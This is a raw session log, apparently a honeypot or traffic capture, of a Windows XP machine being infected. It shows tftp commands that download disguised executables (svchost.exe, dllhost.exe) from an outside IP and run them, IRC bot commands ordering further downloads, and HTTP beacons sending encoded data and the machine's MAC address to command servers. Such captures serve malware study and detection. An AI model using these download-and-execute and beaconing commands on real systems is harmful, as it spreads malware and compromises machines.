VICTIM: Microsoft Windows XP [Version 5.1.2600]
VICTIM: (C) Copyright 1985-2001 Microsoft Corp.
    C:\WINDOWS\system32>
VICTIM: dir wins\dllhost.exe
VICTIM: Volume in drive C has no label.
    Volume Serial Number is 3CF1-1DE8
    Directory of C:\WINDOWS\system32\wins
    File Not Found
    C:\WINDOWS\system32>
VICTIM: dir dllcache\tftpd.exe
VICTIM: Volume in drive C has no label.
    Volume Serial Number is 3CF1-1DE8
    Directory of C:\WINDOWS\system32\dllcache
    File Not Found
    C:\WINDOWS\system32>
VICTIM: tftp -i 222.232.195.65 get svchost.exe wins\SVCHOST.EXE
VICTIM: \000\001svchost.exe\000octet\000
VICTIM: Transfer successful: 35088 bytes in 19 seconds, 1846 bytes/s
VICTIM: C:\WINDOWS\system32>
VICTIM: \000\001dllhost.exe\000octet\000
VICTIM: tftp -i 222.232.195.65 get dllhost.exe wins\DLLHOST.EXE
VICTIM: Transfer successful: 25600 bytes in 14 seconds, 1828 bytes/s
VICTIM: C:\WINDOWS\system32>
VICTIM: wins\DLLHOST.EXE
VICTIM: NICK jcnzpokj
    USER a020501 . . :_
VICTIM: JOIN &virtu
ATTACKER: :u. PRIVMSG jcnzpokj :!get http://210.83.81.173:88/nmb.exe
    :u. PRIVMSG jcnzpokj :!get http://serf654.com/08d.txt
    :u. PRIVMSG jcnzpokj :!get http://open-consulting-company.com/fast.exe
VICTIM: GET /nmb.exe HTTP/1.0
    User-Agent: Download
    Host: 210.83.81.173:88
    Pragma: no-cache
ATTACKER: GET /list.php?c=B4AC885F94224AE64DAAC6EE0346C213D049B58E0B1669C2DCEECA9E5FF8F6D1DFE10E13F3845D3386FFC45E0D4897B5778D4CBB9FE6A5C74322&v=2&t=0.693371 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)
    Host: 210.83.81.173:888
    Connection: Keep-Alive
    Pragma: no-cache
VICTIM: HEAD /a8.txt?t=0.7987967 HTTP/1.0
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Host: 122.224.18.20:88
    Content-Length: 0
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /a8.txt?t=0.7452356 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)
    Host: 122.224.18.20:88
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /sn.php?c=948AB1552CBCF756D93597B99DDA7BC5FF61462E6C48BB2276137F3E23FAA9F2B2C9F7EE7A10AC98D1EC630D1D0C50497EB0D26AB0DF3C6915773F9A0F746415085B67C1DA0F801F81BBD8A231DFBC6349BE4B76BCC2B1B7E84A335EEF0C941C0E5F968B8C97AD3631821C9B69690B91788F654A73347750D881A0CFF345A6187C795AFE1023B2756B5393C19556CB4F&t=0.292309 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)
    Host: 210.83.81.173:888
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /sn.php?c=110F00E4CE5EC5642EC2BD93A0E771CF009EFD95FDD94CD5E2874100AA730F547209455CCDA7605492AFEA840A1B5F46B27C74CCED827C295230F55088F38BFAC29109AF5D881A852D17C4BE7D9302DDD522E9D4F28C3C3AA0025D305BB8F67ED485DBC6D6CDE67D1FACE87E23DADF57DA2F0A540556A2908E9A3540EC4EF60CB8A88622D2FDFB44C9F1336463A2BB3F71AF&t=5.476016E-02 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)
    Host: 210.83.81.173:888
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /08d.txt HTTP/1.0
    User-Agent: Download
    Host: serf654.com
    Pragma: no-cache
VICTIM: HEAD /mstrz.jpg?t=0.6789001 HTTP/1.0
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Host: 58.150.174.222
    Content-Length: 0
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /mstrz.jpg?t=0.5026972 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)
    Host: 58.150.174.222
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /sn.php?c=130D0CE8F565F453372C5C021058C030BC754E26F6D517DDDAEACA8941EF3D6595C45543AF9506593F59871CC8F2EB073EFBBF05C1B35D0E0F3E156FA10959C78BDB90ECA2A13DA26A5099E3DA34DA0505F2B08D1A64CACC60C25E3317F4048C67366B76C7DCAD3678CB50D70E0E31AB22D5EFC09ADD93B42D7482ED0BBD01BFDADED27B586AAC696B5EA9FB6EA6D7AC&t=0.9376947 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)
    Host: 210.83.81.173:888
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /sn.php?c=D1CFEF0B7DED49EEF0EB8AD4FDB513E3F23BA3CB95B6E329FACA5F1C258B28708FDEB9AF0B31D6899FF977EC477D01EDC4015CE6DDAFAAF9C5F4A0DA7BD3D94760309DE15C5FEB74477DCBB16C822EF1689FEED3ADD3ABAD71D38EE3D93A43CB94C5A8B54952FE658734A33515EC9F17D02585DB7D2E7C4E3F2B6712882A8C76BCAC2683EADCC207427A5C052BEA99182CF7&t=0.6319696 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)
    Host: 210.83.81.173:888
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /p6.asp?MAC=00-0C-29-0E-2C-21&Publicer=tr2 HTTP/1.0
    User-Agent: CA 0.0.0.2
    Host: www.zzxml.com
VICTIM: HEAD /tony.exe?t=0.3428832 HTTP/1.0
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Host: 122.224.18.20:88
    Content-Length: 0
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET / HTTP/1.0
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Host: nevof.com
    Connection: Keep-Alive
ATTACKER: GET /tony.exe?t=0.2221186 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)
    Host: 122.224.18.20:88
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /js.php?id=1123 HTTP/1.0
    Accept: */*
    Referer: http://nevof.com/
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Host: nevof.com
    Connection: Keep-Alive
    Cookie: Apache=192.168.1.187.1336836676832429; nevof.com[L]=1336836676; nevof.com[U]=1; nevof.com[V]=0.3; nevof.com[R]=0; nevof.com[D]=0; nevof.com[OR]=deleted
ATTACKER: GET /css.php?id=1123 HTTP/1.0
    Accept: */*
    Referer: http://nevof.com/
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Host: nevof.com
    Connection: Keep-Alive
    Cookie: Apache=192.168.1.187.1336836676832429; nevof.com[L]=1336836676; nevof.com[U]=1; nevof.com[V]=0.3; nevof.com[R]=0; nevof.com[D]=0; nevof.com[OR]=deleted
ATTACKER: GET /ga.js HTTP/1.0
    Accept: */*
    Referer: http://nevof.com/
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Host: www.google-analytics.com
    Connection: Keep-Alive
ATTACKER: GET /relative/static/1330035304_bg-grad.gif HTTP/1.0
    Accept: */*
    Referer: http://nevof.com/
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Host: images01.tzimg.com
    Connection: Keep-Alive
ATTACKER: GET /image.php?FilePath=h3w4/1181756050_tropical_beach1_ca.jpg&Width=500 HTTP/1.0
    Accept: */*
    Referer: http://nevof.com/
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Host: images01.tzimg.com
    Connection: Keep-Alive
ATTACKER: GET /cache/h3w4/500_1181756050_tropical_beach1_ca.jpg HTTP/1.0
    Accept: */*
    Referer: http://nevof.com/
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Host: images01.tzimg.com
    Connection: Keep-Alive